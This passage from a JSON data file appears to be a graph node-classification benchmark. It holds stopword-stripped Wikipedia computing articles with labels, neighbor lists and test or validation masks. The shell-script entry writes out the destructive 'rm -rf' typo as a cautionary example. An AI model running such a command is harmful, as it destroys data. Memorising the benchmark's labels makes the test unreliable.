designed awe64 awe64 value simmconn gold designed awe64 gold although adapters longer ordered design manufacturing files remain available download personal non-commercial use",
    "neighbors": [
      2368,
      6971,
      10371,
      9799,
      10363,
      6129,
      8561,
      10359,
      10360,
      4699
    ],
    "mask": "None"
  },
  {
    "node_id": 10370,
    "label": 8,
    "text": "GoAccess:goaccess goaccess open-source web analytics application unix-like operating systems text-based web application user interface provide real-time analytics continuously monitoring web server logs https //geekflare.com/monitor-analyze-access-logs-goaccess/",
    "neighbors": [
      225,
      823,
      7983,
      6576,
      119,
      5397,
      1943,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10371,
    "label": 3,
    "text": "Sound_Blaster_AWE32:sound blaster awe32 sound blaster awe32 isa sound card creative technology expansion board pcs part sound blaster family products sound blaster awe32 introduced march 1994 near full-length isa sound card measuring 14 inches 356 mm length due number features included awe32 digital audio section basically entire sound blaster 16 compatible creative earlier sound blaster 2.0 minus c/ms audio chips specifications included 16-bit 44.1 khz ad/da conversion real-time on-board compression decompression yamaha opl3 fm synthesizer chip however compatibility always perfect situations various bugs could arise games many sound blaster awe32 cards codecs supported bass treble gain adjustments creative included mixer software many variants revisions awe32 however numerous variations audio chipset amplifier selection design supported features example sound blaster awe32 boards utilize vibra chip bass treble adjustments sound blaster awe32 included two distinct audio sections one creative digital audio section audio codec optional csp/asp chip socket second e-mu midi synthesizer section synthesizer section consisted emu8000 synthesizer effects processor chip 1 mib emu8011 sample rom variable amount ram none sb32 512 kib awe32 ram expandable 28 mib cards chips comprised powerful flexible sample-based synthesis system based e-mu high-end sampler systems e-mu emulator iii e-mu proteus effects processor generated various effects i.e reverb chorus environments midi output similar later eax standard live newer cards also add effects output yamaha opl-3 fm synthesis awe32 first sampler support e-mu soundfont standard allowed users build custom sound sets using samples samples included rom card sold software building custom soundfonts creative subsequent cards sound blaster pci64/128 series support soundfonts initial release creative promoted emu8000 waveguide physical modelling synthesis engine due ability work delay lines option used mostly effect engine chorus flanging effects actual physical modeling instruments popular awe although support exists soundfont format awe32 n't use mpu-401 port access emu8000—creative decided expose emu8000 registers directly three sets non-standard ports interpret midi commands software host cpu gravis ultrasound software designers write special awe32 support programs support older software awe32 featured opl-3 fm synthesis came aweutil program attempted provide gm/mt-32/gs redirection native awe hardware however aweutil n't compatible programs motherboards due use non-maskable interrupt feature omitted disabled many clone boards used lot precious dos conventional memory also game used dos 32-bit protected mode non-dpmi compliant dos extender mpu-401 emulation would function emu8000 would used unless directly supported software affect creative wave blaster daughterboard header awe32 usage windows simplified fact windows 3.1x drivers made opl3 emu8000 appear like another midi peripheral midi interfaces sound blaster awe32 value another value-oriented offering lacked simm slots asp processor featured 512kb onboard ram empty asp chip socket also awe32 panasonic/sony/mitsumi cd-rom interface support proprietary non-atapi cd-rom drives wave blaster header two 30-pin simm slots increase sample memory later sound blaster awe32 revisions replaced proprietary cd-rom interfaces atapi interface sound blaster awe32 supported 28 mb additional simm memory maximum 32 mb could added sound blaster awe32 synthesizer could address 4mb emu8000 address space reserved sample rom following model numbers assigned sound blaster awe32 sound blaster 32 sb32 value-oriented offering creative announced june 6 1995 designed fit awe32 value lineup sb32 lacked onboard ram wave blaster header csp socket boards also used vibra integrated audio chips lacked adjustments bass treble gain sb32 midi capabilities awe32 30-pin simm ram expansion capability board also fully compatible awe32 option software used windows drivers sb32 outfitted 30-pin simms sampler section performed identically awe32 opl-3 support varied among models ct3930 came yamaha ymf262 opl-3 fm synthesis chip whereas models feature cqm synthesis either integrated vibra chip via external ct1978 chip majority sound blaster 32 cards used tda1517 amplifiers sound blaster 32 pnp onboard 512kb ram sold awe32 oem dell computers following model numbers assigned sound blaster 32",
    "neighbors": [
      2368,
      6971,
      10369,
      5702,
      9799,
      683,
      10363,
      6510,
      6415,
      400,
      6129,
      8561,
      10359,
      10360,
      4699,
      1660,
      1247
    ],
    "mask": "None"
  },
  {
    "node_id": 10372,
    "label": 4,
    "text": "Robert_Slade:robert slade robert michael slade also known robert m. slade rob slade canadian information security consultant researcher instructor author robert slade guide computer viruses software forensics dictionary information security co-author viruses revealed slade author thousands technical book reviews today published techbooks mailing list risks digest archived internet review project expert computer viruses malware also mr. slade mr. slade lists slade married gloria j. slade edits much work editor slade book reviews grandchildren appear field every review 2008 rob grandpa ryan trevor devon hannah holds bachelor degree university british columbia master computer information science education university oregon diploma christian studies regent college slade became one small number researchers called world experts malware fred cohen named slade early work organizing computer viruses software bbses book reviews mr. slade lists slade one fewer thirty people worldwide credited contributions final version virus-l faq usenet group comp.virus virus-l mailing list public group record computer virus issues 1988 1995 1996 maintained antiviral software evaluation faq quick reference users seeking antivirus software vendor contacts list contributor well least three group computer virus faqs web came prominence written two books viruses sole author robert slade guide computer viruses first published 1994 2nd edition 1996 co-wrote viruses revealed david harley urs gattiker 2001 slade advanced field computer forensics antivirus research found intentions identity virus authors discovered program code created first course ever offered forensic programming book software forensics published 2004 chapter subject print information security management handbook fifth edition today slade consultant businesses government—among client list fortune 500 companies government canada—as well educational institutions created curricula taught courses simon fraser university macdonald dettwiler university phoenix slade creates seminars local federal international training groups senior instructor isc ² develops courses information security quality assurance qa seek certification slade one world approximately 60,000 cissps certification used private industry well least united states government defense slade moved online security glossary 2006 book dictionary information security virus bulletin remarked unusual collection five forewords many acknowledged experts willing contribute says something author standing field —the forewords written fred cohen jack holleran peter g. neumann harold tipton gene spafford dictionary considered dependable baseline definitions citable common source slade surveyed literature field shared knowledge internet review project published book reviews perhaps widely known reviews works gave first priority information security reviews often critical—to project faq question n't like books slade replied may cruel fair",
    "neighbors": [
      9051,
      9283,
      10307,
      8613,
      8155,
      9319,
      3342,
      7515,
      7739,
      5373
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10373,
    "label": 2,
    "text": "OpenCable_Application_Platform:opencable application platform opencable application platform ocap operating system layer designed consumer electronics connect cable television system java-based middleware portion platform unlike operating systems personal computer cable company controls ocap programs run consumer machine designed cablelabs cable networks north america ocap programs intended interactive services ecommerce online banking electronic program guides digital video recording cable companies required ocap part cablecard 2.0 specification proposal controversial approved federal communications commission cable companies stated two-way communications third party devices networks require support ocap consumer electronics association groups argue ocap intended block features compete cable company provided services consumers entitled add delete otherwise control programs personal computers january 8 2008 cablelabs announced tru2way brand opencable platform including ocap application platform ocap java based software/middleware portion opencable initiative ocap based globally executable mhp gem -standard defined cablelabs ocap based gem lot common multimedia home platform mhp -standard defined dvb project present two versions ocap standard exist",
    "neighbors": [
      3561,
      5677,
      7983,
      8882,
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 10374,
    "label": 1,
    "text": "REAL_Server:real server real server relational database management system rdbms built top sqlite database engine real server evolved sqliteserver originally developed sqlabs 2004 may 2005 real software inc. creator realbasic purchased source code copyrights sqliteserver invested development 2007/2008 first version real sql server released new version released april 2009 renamed real server september 2010 sqlabs repurchased server intellectual properties new major release development sqlabs team real server used following",
    "neighbors": [
      10048,
      8644,
      6797,
      10413,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10375,
    "label": 3,
    "text": "Bobcat_(microarchitecture):bobcat microarchitecture amd bobcat family 14h microarchitecture created amd amd apus aimed low-power/low-cost market revealed speech amd executive vice-president henri richard computex 2007 put production q1 2011 one major supporters executive vice-president mario a. rivas felt difficult compete x86 market single core optimized 10–100 w range actively promoted development simpler core target range 1–10 w. addition believed core could migrate hand-held space power consumption reduced less 1 w. bobcat cores used together gpu cores accelerated processing units apus fusion brand simplified architecture diagram released amd analyst day november 2009 similar concept earlier amd research 2003 detailing specifications advantages extending x86 everywhere bobcat x86 cpu core design since completed implemented amd apu processor products tdp 18 w less core targeted low-power markets like netbooks/nettops ultra-portable laptops consumer electronics embedded market since launch bobcat-based cpus also used oems larger laptops architecture specifics february 2013 amd detailed plans successor bobcat codenamed jaguar january 2011 amd introduced several processors implemented bobcat core core following amd accelerated processors e-series c-series standard parts g-series embedded parts",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      9475,
      6151,
      8327,
      5645,
      398,
      6926,
      10260,
      7963,
      2719,
      2850,
      9122,
      5541,
      8231,
      11047,
      2094,
      11183,
      6705,
      1461,
      9400,
      8125,
      8126,
      6978,
      7234,
      11080,
      2764,
      7247,
      9551,
      977,
      7122,
      9427,
      5844,
      473,
      9057,
      5859,
      7783,
      5356,
      1005,
      9964,
      10734,
      1137,
      4465,
      2549,
      630,
      11130,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 10376,
    "label": 2,
    "text": "Sunwah_Linux:sunwah linux rays linux previously sun wah linux chinese debian-based linux distribution sunwah linux debian-based distribution first chinese linux distribution receive linux standard base lsb certification system architecture designed hong kong programming developed nanjing distribution sponsored sunwah group hong kong jiangsu provincial government china sunwah pearl linux abbreviated swp technology training entity group providing research assistance testing training support distribution swp joint establishment hong kong polytechnic university sunwah group 2005 sunwah linux installed 140,000 pcs primary secondary schools china april 2006 sunwah linux best linux desktop application award linuxworld conference expo boston according albert chung presented distribution judges competition fierce proud chinese linux desktop distribution recognized industry experts judges",
    "neighbors": [
      5363,
      2559,
      5397,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10377,
    "label": 7,
    "text": "Apache_Mahout:apache mahout apache mahout project apache software foundation produce free implementations distributed otherwise scalable machine learning algorithms focused primarily areas collaborative filtering clustering classification many implementations use apache hadoop platform mahout also provides java libraries common maths operations focused linear algebra statistics primitive java collections mahout work progress number implemented algorithms grown quickly various algorithms still missing mahout core algorithms clustering classification batch based collaborative filtering implemented top apache hadoop using map/reduce paradigm restrict contributions hadoop-based implementations contributions run single node non-hadoop cluster also welcomed example 'taste collaborative-filtering recommender component mahout originally separate project run stand-alone without hadoop starting release 0.10.0 project shifted focus building backend-independent programming environment code named samsara environment consists algebraic backend-independent optimizer algebraic scala dsl unifying in-memory distributed algebraic operators supported algebraic platforms apache spark h2o apache flink support mapreduce algorithms started gradually phased 2014",
    "neighbors": [
      8460,
      7567,
      1296,
      6161,
      11535,
      1047,
      1913,
      8217,
      6555,
      8860,
      11161,
      3877,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      11343,
      4944,
      1363,
      7802,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      3705,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 10378,
    "label": 4,
    "text": "Trusted_path:trusted path trusted path trusted channel mechanism provides confidence user communicating user intended communicate ensuring attackers ca n't intercept modify whatever information communicated term initially introduced orange book security architecture concept implemented technical safeguards suitable particular environment risk profile common criteria european union electronic signature standards trusted path trusted channel describe techniques prevent interception tampering sensitive data passes various system components one popular techniques password stealing microsoft windows login spoofing based programs simulated operating system login prompt users try log fake login program capture user passwords later use safeguard windows nt introduced ctrl-alt-del sequence secure attention key escape third party programs invoke system login prompt similar problem arises case websites requiring authentication user expected enter credentials without actually knowing website spoofed https mitigates attack first authenticating server user using trust anchor certification path validation algorithm displaying login form",
    "neighbors": [
      2432,
      8417,
      8418,
      4163,
      4067,
      8904,
      6797,
      8976,
      9745,
      4404,
      10933,
      1496
    ],
    "mask": "Test"
  },
  {
    "node_id": 10379,
    "label": 4,
    "text": "Dave_the_Resurrector:dave resurrector dave resurrector so-called resurrector bot responded attempts canceling message usenet newsgroup news.admin.net-abuse re-posting message written chris lewis bot notable one first escalations spam arms race",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10380,
    "label": 4,
    "text": "GMER:gmer gmer software tool written polish researcher przemysław gmerek detecting removing rootkits runs microsoft windows support windows nt 2000 xp vista 7 8 10 version 2.0.18327 full support windows x64 added time first release 2004 introduced innovative rootkit detection techniques quickly gained popularity effectiveness incorporated antivirus tools including avast antivirus sdfix several months 2006 2007 tool website target heavy ddos attacks attempting block downloads",
    "neighbors": [
      9791,
      7515,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 10381,
    "label": 4,
    "text": "Amplitude-shift_keying:amplitude-shift keying amplitude-shift keying ask form amplitude modulation represents digital data variations amplitude carrier wave ask system binary symbol 1 represented transmitting fixed-amplitude carrier wave fixed frequency bit duration seconds signal value 1 carrier signal transmitted otherwise signal value 0 transmitted digital modulation scheme uses finite number distinct signals represent digital data ask uses finite number amplitudes assigned unique pattern binary digits usually amplitude encodes equal number bits pattern bits forms symbol represented particular amplitude demodulator designed specifically symbol-set used modulator determines amplitude received signal maps back symbol represents thus recovering original data frequency phase carrier kept constant like ask also linear sensitive atmospheric noise distortions propagation conditions different routes pstn etc ask modulation demodulation processes relatively inexpensive ask technique also commonly used transmit digital data optical fiber led transmitters binary 1 represented short pulse light binary 0 absence light laser transmitters normally fixed bias current causes device emit low light level low level represents binary 0 higher-amplitude lightwave represents binary 1 simplest common form ask operates switch using presence carrier wave indicate binary one absence indicate binary zero type modulation called on-off keying ook used radio frequencies transmit morse code referred continuous wave operation sophisticated encoding schemes developed represent data groups using additional amplitude levels instance four-level encoding scheme represent two bits shift amplitude eight-level scheme represent three bits forms amplitude-shift keying require high signal-to-noise ratio recovery nature much signal transmitted reduced power ask system divided three blocks first one represents transmitter second one linear model effects channel third one shows structure receiver following notation used different symbols represented different voltages maximum allowed value voltage possible values range −a given difference one voltage considering picture symbols v n generated randomly source impulse generator creates impulses area v n impulses sent filter ht sent channel words symbol different carrier wave sent relative amplitude transmitter signal expressed form receiver filtering hr signal use notation indicates convolution two signals a/d conversion signal z k expressed form relationship second term represents symbol extracted others unwanted first one effect noise third one due intersymbol interference filters chosen g satisfy nyquist isi criterion intersymbol interference value sum zero transmission affected noise probability density function error given size modelled gaussian function mean value relative sent value variance given formula_9 spectral density noise within band hr f continuous fourier transform impulse response filter hr f probability making error given example formula_11 conditional probability making error given symbol v0 sent formula_12 probability sending symbol v0 probability sending symbol represent probability density functions plot possible value voltage transmitted get picture like particular case formula_14 shown probability making error single symbol sent area gaussian function falling functions symbols shown cyan one call formula_15 area one side gaussian sum areas formula_16 total probability making error expressed form calculate value formula_15 order move origin reference wherever want area function change situation like one shown following picture matter gaussian function considering area want calculate value looking given following integral formula_20 complementary error function putting results together probability make error formula_21 formula easily understand probability make error decreases maximum amplitude transmitted signal amplification system becomes greater hand increases number levels power noise becomes greater relationship valid intersymbol interference i.e formula_22 nyquist function",
    "neighbors": [
      3040,
      1121,
      5664,
      7490,
      3140,
      7108,
      8160,
      11686,
      2920,
      7400,
      1550,
      2994,
      2968,
      5020,
      5304
    ],
    "mask": "Test"
  },
  {
    "node_id": 10382,
    "label": 2,
    "text": "Dm-cache:dm-cache dm-cache component specifically target linux kernel device mapper framework mapping block devices onto higher-level virtual block devices allows one fast storage devices flash-based solid-state drives ssds act cache one slower storage devices hard disk drives hdds effectively creates hybrid volumes provides secondary storage performance improvements design dm-cache requires three physical storage devices creation single hybrid volume dm-cache uses storage devices separately store actual data cache data required metadata configurable operating modes cache policies latter form separate modules determine way data caching actually performed dm-cache licensed terms gnu general public license gpl joe thornber heinz mauelshagen mike snitzer primary developers dm-cache uses solid-state drives ssds additional level indirection accessing hard disk drives hdds improving overall performance using fast flash-based ssds caches slower mechanical hdds based rotational magnetic media result costly speed ssds becomes combined storage capacity offered slower less expensive hdds moreover case storage area networks sans used cloud environments shared storage systems virtual machines dm-cache also improve overall performance reduce load sans providing data caching using client-side local storage dm-cache implemented component linux kernel device mapper volume management framework allows various mappings created physical virtual block devices way mapping devices created determines virtual blocks translated underlying physical blocks specific translation types referred targets acting mapping target dm-cache makes possible ssd-based caching part created virtual block device configurable operating modes cache policies determine dm-cache works internally operating mode selects way data kept sync hdd ssd cache policy selectable separate modules implement policies provides algorithm determining blocks promoted moved hdd ssd demoted moved ssd hdd cleaned etc configured use multiqueue mq stochastic multiqueue smq cache policy latter default dm-cache uses ssds store data associated performed random reads writes capitalizing near-zero seek times ssds avoiding i/o operations typical hdd performance bottlenecks data associated sequential reads writes cached ssds avoiding undesirable cache invalidation operations performance-wise beneficial sequential i/o operations suitable hdds due mechanical nature caching sequential i/o also helps extending lifetime ssds used caches another dm-cache project similar goals announced eric van hensbergen ming zhao 2006 result internship work ibm later joe thornber heinz mauelshagen mike snitzer provided implementation concept resulted inclusion dm-cache linux kernel dm-cache merged linux kernel mainline kernel version 3.9 released april 28 2013 dm-cache creating mapped virtual block device acts hybrid volume requires three physical storage devices internally dm-cache references origin devices number fixed-size blocks size blocks equaling size caching extent configurable creation hybrid volume size caching extent must range 32 kb 1 gb must multiple 32 kb typically size caching extent 256 1024 kb choice caching extents bigger disk sectors acts compromise size metadata possibility wasting cache space small caching extents increases size metadata metadata device kernel memory large caching extents increases amount wasted cache space due caching whole extents even case high hit rates parts operating modes supported dm-cache write-back default write-through pass-through write-back operating mode writes cached blocks go cache device blocks origin device marked dirty metadata write-through operating mode write requests returned completed data reaches origin cache devices clean blocks becoming marked dirty pass-through operating mode reads performed directly origin device avoiding cache writes go directly origin device cache write hits also cause invalidation cached blocks pass-through mode allows hybrid volume activated state cache device known consistent origin device rate data migration dm-cache performs directions i.e. data promotions demotions throttled configured speed regular i/o origin cache devices preserved decommissioning hybrid volume shrinking cache device requires use cleaner policy effectively flushes blocks marked metadata dirty cache device origin device version 4.2 linux kernel following three cache policies distributed linux kernel mainline dm-cache default uses stochastic multiqueue policy",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      10272,
      10785,
      3618,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      10811,
      576,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      4194,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      8326,
      8328,
      6797,
      4238,
      7821,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      4841,
      7403,
      9455,
      10482,
      3315,
      5363,
      2294,
      8439,
      2809,
      2811,
      3323,
      7938,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      1813,
      792,
      10016,
      6434,
      2339,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      4438,
      5975,
      11095,
      10590,
      8551,
      10091,
      5492,
      7540,
      1400,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11155,
      11667,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      935,
      9637,
      4521,
      4011,
      9646,
      1456,
      11184,
      1972,
      6075,
      9660,
      6078,
      9151,
      9667,
      1990,
      8136,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10383,
    "label": 3,
    "text": "VEX_prefix:vex prefix vex prefix vector extensions vex coding scheme comprising extension x86 x86-64 instruction set architecture microprocessors intel amd others vex coding scheme allows definition new instructions extension modification previously existing instruction codes serves following purposes vex prefix replaces commonly used instruction prefix bytes escape codes many cases number prefix bytes escape bytes replaced number bytes vex prefix total length vex-encoded instruction length legacy instruction code cases vex-encoded version longer shorter legacy code 32-bit mode vex encoded instructions access first 8 ymm/xmm registers encodings registers would interpreted legacy lds les instructions supported 64-bit mode two-byte vex prefix contains following components three-byte vex prefix additionally contains vex coding scheme uses code prefix consisting two three bytes added existing new instruction codes x86 architecture instructions memory operand may use modr/m byte specifies addressing mode byte three bit fields base-plus-index scale-plus-index forms 32-bit addressing encoded r/m=100 mod 11 require another addressing byte sib byte following fields use 64-bit addressing additional registers present x86-64 architecture rex prefix introduced provides additional space encoding addressing modes bit-field w expands operand size 64 bits r expands reg b expands r/m reg depending opcode format used x b expand index base sib byte however rex prefix encoded quite inefficiently wasting half 8 bits vex prefix provides compact representation rex prefix well various prefixes expand addressing mode register enumeration operand size width vex prefix initial-byte values c4h c5h opcodes lds les instructions instructions supported 64-bit mode resolve ambiguity 32-bit mode vex specification exploits fact legal lds les modrm byte form 11xxxxxx would specify register operand various bit-fields vex prefix second byte inverted ensure byte always form 32-bit mode instructions need three operands extra suffix byte specifying one two additional register operands instructions coded vex prefix five operands one operands memory operand one operands immediate constant 4 8 bits remaining operands registers avx instruction set first instruction set extension use vex coding scheme avx instructions four operands avx instruction set allows vex prefix applied instructions using simd xmm registers however vex coding scheme space applying vex prefix instructions well future instruction sets legacy simd instructions vex prefix added equivalent instructions without vex prefix following differences instructions use whole 256-bit ymm register mixed non-vex instructions leave upper half register unchanged reasons efficiency",
    "neighbors": [
      833,
      2821,
      9126,
      5356,
      5358,
      1489,
      499,
      372,
      9428,
      9911,
      7963,
      9500,
      8126,
      2655
    ],
    "mask": "None"
  },
  {
    "node_id": 10384,
    "label": 8,
    "text": "FDM_Group:fdm group fdm group international professional services company headquartered london united kingdom offices leeds glasgow brighton new york city toronto reston frankfurt hong kong singapore australia china composed mostly university graduates returners work ex-military personnel 'trained fdm group academies working consultants one fdm group ’ clients primarily financial institutions banks around world listed london stock exchange constituent ftse 250 index company founded brighton rod flavell julian jacqueline divett 1991 company focused recruitment acquiring mountfield software 1995 1998 name changed fdm group reflect acquisition company began hiring training placing consultants on-site clients april 2005 fdm group floated alternative investment market raising £3m net company 2010 company completed management buyout bring company private june 2014 fdm flotation time valued £308m london stock exchange fdm group remains publicly traded london stock exchange today 2015 company opened new offices city centres leeds glasgow fdm group ’ model involves recruiting recent university graduates returners work ex-forces turn consultants clients individuals go 6–14 weeks paid training one fdm group ’ academy facilities signing two-year contract company work consultant consultants employees work site clients include mostly banking finance industry fdm group women initiative focused hiring inspiring women pursue jobs stem fields part efforts sponsored 2013 2014 2015 2016 everywoman technology awards london fdm group also ex-forces initiative began new york academy veterans initiative partnered british forces resettlement services signed ministry defence armed forces corporate covenant well us army memorandum agreement army pays programme new york fdm group sponsored wall street rocks charity concert marched veterans day parade support cause helping veterans find jobs fdm group two academies located united states one academy new york opened 2011 located 14 wall street new york new york 10005 2016 fdm group opened training center virginia located 1805 library street reston va 20190 february 2016 class action lawsuit filed united states district court southern new york grace park fdm group holdings plc fdm group inc. alleging state wage violations us fair labor standards act flsa march 2017 united states district court southern new york found favor fdm group motion dismissal finding fdm group correctly classified academy trainees non-employees therefore entitled compensation court also found termination fee stipulated training agreement signed park 30,000 constitute kickback park failed provide sufficient details regarding unpaid work april 2017 park filed appeal 2nd circuit court appeals park v. fdm group inc. case number 17-1030",
    "neighbors": [
      2859,
      9055
    ],
    "mask": "Test"
  },
  {
    "node_id": 10385,
    "label": 4,
    "text": "Lumension_Security:lumension security lumension security inc. part software company ivanti lumension products include endpoint management security software providing endpoint protection vulnerability management data protection application whitelisting encryption usb security risk management lumension largely focused providing security organizations businesses 2017 lumension part merger landesk heat software create new software company called ivanti lumension founded high tech software 1991 company rebranded patchlink corporation 1999 adopted lumension name 2007 2015 frontrange lumension combined create heat software 2017 heat landesk combined create ivanti lumension products traditionally competed endpoint management security industry sophos mcafee kaspersky lab symantec trend micro among others",
    "neighbors": [
      704,
      7809,
      9569,
      9129,
      3629,
      4464,
      9488,
      4755,
      9055,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 10386,
    "label": 9,
    "text": "Ike_Nassi:ike nassi isaac robert ike nassi born 1949 brooklyn new york currently ceo tidalscale inc. campbell ca adjunct professor computer science university california santa cruz formerly executive vice president chief scientist sap ag practice lead sap research technology infrastructure practice focused guiding sap technology infrastructure vision direction execution group also responsible sap sponsored academic research program probably best known creating ben shneiderman highly influential nassi–shneiderman diagram notation also helped design ada programming language prior work tidalscale sap nassi helped start three companies firetide infogear technology encore computer co-founded wireless mesh company firetide served executive vice president chief technology officer cto chairman board nassi cto head product operations infogear prior acquisition cisco systems helped start encore computer pioneer symmetric multiprocessors forerunner today multicore processors addition start-up experience nassi held executive position cisco systems following acquisition infogear technology joined apple inc. run new advanced technology group research lab cambridge near mit work dylan programming language intended apple newton become vp development tools california become senior vice president software launch mklinux become corporate officer served boards taligent opendoc foundation also held executive senior management roles visual technology tewkesbury digital equipment corporation softech nassi serves active member board trustees computer history museum mountain view california formerly served board anita borg institute women technology member industry advisory board ieee computer society member advisory boards northwestern university stony brook university peking university visiting scholar stanford university u.c berkeley recently visiting scientist mit nassi holds several patents certificate distinguished service department defense work design ada programming language member defense advanced research projects agency information systems technology group testified congress emerging telecommunications act 1991 nassi holds memberships ieee acm earned bachelor degree mathematics master degree doctorate computer science stony brook university new york",
    "neighbors": [
      9123,
      6234,
      2282,
      3051,
      428,
      1389,
      11118,
      6554,
      9999,
      11696,
      6834,
      9778,
      5210,
      4251
    ],
    "mask": "Test"
  },
  {
    "node_id": 10387,
    "label": 9,
    "text": "Shell_script:shell script shell script computer program designed run unix shell command-line interpreter various dialects shell scripts considered scripting languages typical operations performed shell scripts include file manipulation program execution printing text script sets environment runs program necessary cleanup logging etc called wrapper term also used generally mean automated mode running operating system shell specific operating systems called things batch files msdos-win95 stream os/2 command procedures vms shell scripts windows nt stream third-party derivatives like 4nt—article cmd.exe mainframe operating systems associated number terms typical unix/linux/posix-compliant installation includes kornshell codice_1 several possible versions ksh88 korn shell '93 others oldest shell still common use bourne shell codice_2 unix systems invariably also include c shell codice_3 bash codice_4 remote shell codice_5 secure shell codice_6 ssl telnet connections shell main component tcl/tk installation usually called codice_7 wish gui-based tcl/tk shell c tcl shells syntax quite similar said programming languages korn shells bash developments bourne shell based algol language elements number others added well hand various shells plus tools like awk sed grep basic lisp c forth contributed perl programming language shells available machine available download and/or purchase include almquist shell codice_8 powershell codice_9 z shell codice_10 particularly common enhanced kornshell tenex c shell codice_11 perl-like shell codice_12 related programs shells based python ruby c java perl pascal rexx c various forms also widely available another somewhat common shell osh whose manual page states enhanced backward-compatible port standard command interpreter sixth edition unix windows-unix interoperability software mks toolkit cygwin uwin interix others make shells unix programming available windows systems providing functionality way signals inter-process communication system calls apis hamilton c shell windows shell similar unix c shell microsoft distributes windows services unix use nt-based operating systems particular posix environmental subsystem shell script provide convenient variation system command special environment settings command options post-processing apply automatically way allows new script still act fully normal unix command one example would create version ls command list files giving shorter command name l would normally saved user bin directory /home/ username /bin/l default set command options pre-supplied first line shebang indicates interpreter execute rest script second line makes listing options file format indicators columns files none omitted size blocks lc_collate=c sets default collation order fold upper lower case together intermix dotfiles normal filenames side effect ignoring punctuation names dotfiles usually shown option like -a used causes parameters given l pass parameters ls normal options syntax known ls still used user could simply use l commonly used short listing another example shell script could used shortcut would print list files directories within given directory case shell script would start normal starting line /bin/sh following script executes command clear clears terminal text going next line following line provides main function script ls -al command lists files directories directory script run ls command attributes could changed reflect needs user note implementation clear command try using clr command instead shell scripts allow several commands would entered manually command-line interface executed automatically without wait user trigger stage sequence example directory three c source code files rather manually running four commands required build final program one could instead create c shell script named build kept directory would compile automatically script would allow user save file edited pause editor run ./build create updated program test return editor since 1980s however scripts type replaced utilities like make specialized building programs simple batch jobs unusual isolated tasks using shell loops tests variables provides much flexibility users bash unix shell script convert jpeg images png images image names provided command-line—possibly via wildcards—instead listed within script created file typically saved file like /home/ username /bin/jpg2png jpg2png command run entire directory full jpeg images /home/ username /bin/jpg2png *.jpg key feature shell scripts invocation interpreters handled core operating system feature rather user shell able execute scripts shell language script interpreter directive handled correctly run shell limitations early bourne shell handling scripts shell scripts set executed os modern shell script footing system commands rather many system commands actually shell scripts generally scripts since interpreted shell instead perl python language extends returning exit codes like system utilities indicate success failure allows called components larger programs regardless larger tools implemented like standard system commands shell scripts classically omit kind filename extension unless intended read running shell special mechanism purpose sh ’ codice_13 csh ’ source many modern shells also supply various features usually found sophisticated general-purpose programming languages control-flow constructs variables comments arrays subroutines sorts features available possible write reasonably sophisticated applications shell scripts however still limited fact shell languages little support data typing systems classes threading complex math common full language features also generally much slower compiled code interpreted languages written speed performance goal standard unix tools sed awk provide extra capabilities shell programming perl also embedded shell scripts scripting languages like tcl perl tcl come graphics toolkits well many powerful scripting languages introduced tasks large complex comfortably handled ordinary shell scripts advantages script desirable development overhead full-blown compiled programming language would disadvantageous specifics separates scripting languages high-level programming languages frequent source debate generally speaking scripting language one requires interpreter shell scripts often serve initial stage software development often subject conversion later different underlying implementation commonly converted perl python c. interpreter directive allows implementation detail fully hidden inside script rather exposed filename extension provides seamless reimplementation different languages impact end users files .sh file extension usually shell script kind shell scripts filename extension perhaps biggest advantage writing shell script commands syntax exactly directly entered command-line programmer switch totally different syntax would script written different language compiled language used often writing shell script much quicker writing equivalent code programming languages many advantages include easy program file selection quick start interactive debugging shell script used provide sequencing decision-making linkage around existing programs moderately sized scripts absence compilation step advantage interpretive running makes easy write debugging code script re-run detect fix bugs non-expert users use scripting tailor behavior programs shell scripting provides limited scope multiprocessing hand shell scripting prone costly errors inadvertent typing errors rm -rf instead intended rm -rf */ folklore unix community single extra space converts command one deletes everything sub-directories one deletes everything—and also tries delete everything root directory similar problems transform cp mv dangerous weapons misuse redirect delete contents file made problematic fact many unix commands differ name one letter cp cd dd df etc another significant disadvantage slow execution speed need launch new process almost every shell command executed script job accomplished setting pipeline efficient filter commands perform work slowdown mitigated complex script typically several orders magnitude slower conventional compiled program performs equivalent task also 